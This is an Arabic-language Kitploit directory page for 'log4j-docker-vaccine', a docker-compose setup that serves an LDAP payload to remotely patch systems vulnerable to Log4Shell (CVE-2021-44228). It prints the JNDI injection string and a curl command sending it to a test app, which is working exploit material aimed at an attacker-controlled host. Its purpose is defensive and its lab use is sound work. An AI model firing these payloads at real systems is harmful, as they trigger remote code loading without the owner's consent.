Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4j-docker-vaccine — حل docker compose لتشغيل بيئة تطعيم للثغرة log4j2 CVE-2021-44228 | Kitploit
أدوات/GitHubGitHub/jeffbryner/log4j-docker-vaccine
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubjeffbryner/log4j-docker-vaccine

log4j-docker-vaccine

حل docker compose لتشغيل بيئة تطعيم للثغرة log4j2 CVE-2021-44228

عرض المستودع
2منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

لقاح Log4j Docker

طريقة محوسبة (في حاوية) لتشغيل لقاح log4j المقدم من Cyberreason

  • https://github.com/Cybereason/Logout4Shell

تشغيله

انسخ هذا المستودع:

root@kitploit:~
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git

قم بتحرير ملف containers.env لتعيين عنوان IP أو DNS خاص أو عام دقيق يمكن لهدفك الوصول إليه. الإدخال الافتراضي على الأرجح لن يعمل معك!

قم ببناء وتشغيل الحاويات:

root@kitploit:~
docker-compose -f docker-compose.yml -p vaccine up

لديك الآن خادم ldap يستمع ويقدم فئة Log4jRCE لتطعيم نسخة log4j ضعيفة.

يمكنك تعريض هذا للإنترنت (إذا أردت) باستخدام ngrok.

  • https://dashboard.ngrok.com/get-started/setup
root@kitploit:~
ngrok tcp 1389

يمكنك إرسال نسخة ضعيفة من log4j إلى هذا باستخدام سلسلة إدخال jndi سيئة السمعة:

root@kitploit:~
${jndi:ldap://<ngrokurlgoeshere>:1389/a}

اختبار

هناك نسخة ضعيفة عن قصد من log4j في حاوية متاحة على:

  • https://github.com/christophetd/log4shell-vulnerable-app

يمكنك اتباع تعليماتهم لبدء تشغيلها واستخدامها للاختبار:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

وتفعيل التطعيم عبر:

root@kitploit:~
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'
تنزيل الأداة